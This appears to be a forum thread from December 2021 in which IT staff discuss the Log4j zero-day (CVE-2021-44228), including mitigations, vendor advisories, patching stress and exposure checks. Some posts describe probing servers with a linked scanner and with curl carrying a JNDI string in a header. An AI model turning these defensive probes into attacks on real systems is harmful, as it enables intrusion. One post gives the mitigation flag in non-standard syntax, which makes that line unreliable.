|
Log4j zero day just dropped https://twitter.com/campuscodi/status/1469276512847339521?s=20
|
# ? Dec 10, 2021 13:44 |
|
|
# ? May 26, 2024 02:55 |
|
Just in time for everyone to have to justify an emergency patch during their company's holiday code/production change/etc freeze period.
|
# ? Dec 10, 2021 13:52 |
|
We have also been dealing with this at work. Coworker has been testing servers with this python script, but hasn't gotten a hit yet. https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6 Either the servers are using Log4j 1.x, or they are using OpenJDK from RHEL or Ubuntu which have partially mitigated this years ago with CVE-2018-3149.
|
# ? Dec 10, 2021 13:57 |
|
imagine having a job where you aren't terrified of looking at your news feed to see what fresh hell awaits you
|
# ? Dec 10, 2021 14:08 |
|
There's now speculation that Log4j 1.x is also vulnerable. And it's of course also EOL'd and won't receive updates. https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126
|
# ? Dec 10, 2021 14:17 |
|
As a really simple customer-facing mitigation, is payload inspection at a WAF a possible emergency workaround If the concern is arbitrary user input focusing on jndi or am I really naive here. Not enough caffeine and I'm still waking up.
|
# ? Dec 10, 2021 14:29 |
|
Martytoof posted:As a really simple customer-facing mitigation, is payload inspection at a WAF a possible emergency workaround If the concern is arbitrary user input focusing on jndi or am I really naive here. Not enough caffeine and I'm still waking up. Cloudflare has released some stuff as a workaround in, so yes. Also there's mitigation such as adding a java runtime argument that helps prevent it https://twitter.com/_JohnHammond/status/1469255402290401285?s=20 https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/ If you are running anything Java like Minecraft, add this to your Java args until you can update/patch: +log4j2.formatmsgnolookups=true CommieGIR fucked around with this message at 15:03 on Dec 10, 2021 |
# ? Dec 10, 2021 14:50 |
|
CommieGIR posted:If you are running anything Java like Minecraft, add this to your Java args until you can update/patch: +log4j2.formatmsgnolookups=true According to the article, that's all the latest patch does anyway. quote:According to p0rz9, the Chinese security researcher who first posted the exploit code online, CVE-2021-44228 can only be abused if the log4j2.formatMsgNoLookups option in the library’s configuration is set to false.
|
# ? Dec 10, 2021 15:51 |
|
Proteus Jones posted:According to the article, that's all the latest patch does anyway. Lol, gotta love simple fixes
|
# ? Dec 10, 2021 16:03 |
|
Proteus Jones posted:According to the article, that's all the latest patch does anyway. The diff looks to be a might more thorough than just that https://issues.apache.org/jira/browse/LOG4J2-3201, looks like you'd have to change quite a few settings.
|
# ? Dec 10, 2021 16:24 |
|
Already seeing active attempts at exploitation and had to patch at least 1 public facing device. Always on a Friday or a holiday.
|
# ? Dec 10, 2021 17:49 |
|
We still aren't done patching the last CVE
|
# ? Dec 10, 2021 18:52 |
|
Well well well, if it isn't the consequences of our own actions. Sure glad we have no real way to monitor for this vulnerability.
|
# ? Dec 10, 2021 20:15 |
|
Just enable more logg-ohhhhh
|
# ? Dec 10, 2021 20:35 |
|
my thread title still stands
|
# ? Dec 10, 2021 20:55 |
|
I'm so tired
|
# ? Dec 10, 2021 21:05 |
Cup Runneth Over posted:I'm so tired
|
|
# ? Dec 10, 2021 21:12 |
|
https://twitter.com/brianloveswords/status/1469358777409454092
|
# ? Dec 10, 2021 22:15 |
FYI Panorama actually uses log4j, but firewall PAN-OS does not - https://docs.paloaltonetworks.com/oss-listings/panorama-oss-listings/panorama-9-1-open-source-software-oss-listing.html https://docs.paloaltonetworks.com/oss-listings/pan-os-oss-listings/pan-os-9-1-open-source-software-oss-listing.html. PAN just released a security advisory that they're investigating whether or not Panorama is affected https://security.paloaltonetworks.com/CVE-2021-44228
|
|
# ? Dec 10, 2021 23:32 |
|
How many shops are having this conversation right now: "Can anyone tell me how vulnerable we are to log4j? -> can anyone tell me how many apps run on java? -> can anyone tell me how many servers we have???"
|
# ? Dec 10, 2021 23:55 |
|
Martytoof posted:How many shops are having this conversation right now: I feel like the jump from a->b is taking a lot longer than people are willing to talk about.
|
# ? Dec 11, 2021 00:02 |
|
Elastic and logstash: https://github.com/elastic/elasticsearch/issues/81618#issuecomment-991000240
|
# ? Dec 11, 2021 00:03 |
|
rafikki posted:FYI Panorama actually uses log4j, but firewall PAN-OS does not - https://docs.paloaltonetworks.com/oss-listings/panorama-oss-listings/panorama-9-1-open-source-software-oss-listing.html https://docs.paloaltonetworks.com/oss-listings/pan-os-oss-listings/pan-os-9-1-open-source-software-oss-listing.html. PAN just released a security advisory that they're investigating whether or not Panorama is affected https://security.paloaltonetworks.com/CVE-2021-44228 Meanwhile Prisma Cloud Compute (Twistlock) still can't track this CVE, would have been real easy to figure out our exposure if this was working.
|
# ? Dec 11, 2021 00:17 |
|
I'm imagining two or more APTs fighting for dominance inside a clueless organization for the next 6 months and it's pretty much the only thing making me smile right now.
|
# ? Dec 11, 2021 00:50 |
|
One of our team members found out that running curl against our Powerschool SIS servers, intentionally generating a 404, and setting the jdni string in the response header triggered our canary token. So yeah, our division took the SIS off the internet and we're awaiting Powerschool's response.
|
# ? Dec 11, 2021 00:57 |
|
Should I care if I don't run any Java?
|
# ? Dec 11, 2021 01:18 |
|
You may have vendors who do, so generally yes
|
# ? Dec 11, 2021 01:20 |
|
I don't mean like should my company care, but is there something I personally should be doing differently, at home, as someone who isn't running Java.
|
# ? Dec 11, 2021 01:27 |
|
(IMO) You, personally, are a minor target at best. Unless your neighbour really hates you and wants to gently caress with your WiFi by doing the device-name-RCE thing you are probably fine. Stay up to date on vendor patches for your internet connected garbage. If you run a DMZ network on your home LAN then understand what you are exposing and make sure it's patched. Maybe more serious if you have an Android phone I suppose?
|
# ? Dec 11, 2021 01:51 |
|
Absurd Alhazred posted:I don't mean like should my company care, but is there something I personally should be doing differently, at home, as someone who isn't running Java. Honest question, how do you know you're not running Java?
|
# ? Dec 11, 2021 01:56 |
|
If you have anything public facing/accessible it doesn’t hurt to check product pages for patches. I’ve been seeing opportunistic scanning/attempts all day to anything with an ipv4 address, not unlike the exchange stuff earlier in the year. log4j is ubiquitous and the exploit is trivial
|
# ? Dec 11, 2021 01:58 |
|
So minor update: If you are less than version 2.10 of Log4j the Java Exec mitigation won't work. You gotta patch. Found that out in a VM today And VMWare was affected by this https://www.vmware.com/security/advisories/VMSA-2021-0028.html?cid=70134000001YTvO&src=so_5b27ee4a667bd
|
# ? Dec 11, 2021 02:02 |
|
Martytoof posted:Maybe more serious if you have an Android phone I suppose? Oh, dear, yeah, I do have an Android, I hadn't even thought of that. Fart Amplifier posted:Honest question, how do you know you're not running Java? Aside from the Android I forgot had Java in it, I never installed Java on this computer.
|
# ? Dec 11, 2021 02:35 |
|
I mean I'm not saying there's anything identified that is going on with Android right this second, just in my mind a phone that basically runs Java and interacts with the world is probably something to keep an eye on right now.
|
# ? Dec 11, 2021 02:37 |
|
Absurd Alhazred posted:Aside from the Android I forgot had Java in it, I never installed Java on this computer. And you're sure you haven't installed anything that bundles it?
|
# ? Dec 11, 2021 02:55 |
|
Fart Amplifier posted:And you're sure you haven't installed anything that bundles it? I'm pretty sure? How would I check?
|
# ? Dec 11, 2021 03:35 |
|
Absurd Alhazred posted:I'm pretty sure? How would I check? - Every company's infrastructure team with hands on servers on December 10 2021
|
# ? Dec 11, 2021 03:43 |
|
Martytoof posted:- Every company's infrastructure team with hands on servers on December 10 2021 I mean, I looked at Add/Remove programs, I've searched my disk, I don't have java or jre anywhere. Am I missing something?
|
# ? Dec 11, 2021 03:53 |
|
No, i'm being sarcastic. Sorry it's been a long long day.
|
# ? Dec 11, 2021 03:55 |
|
|
# ? May 26, 2024 02:55 |
|
No worries, and I imagine!
|
# ? Dec 11, 2021 03:58 |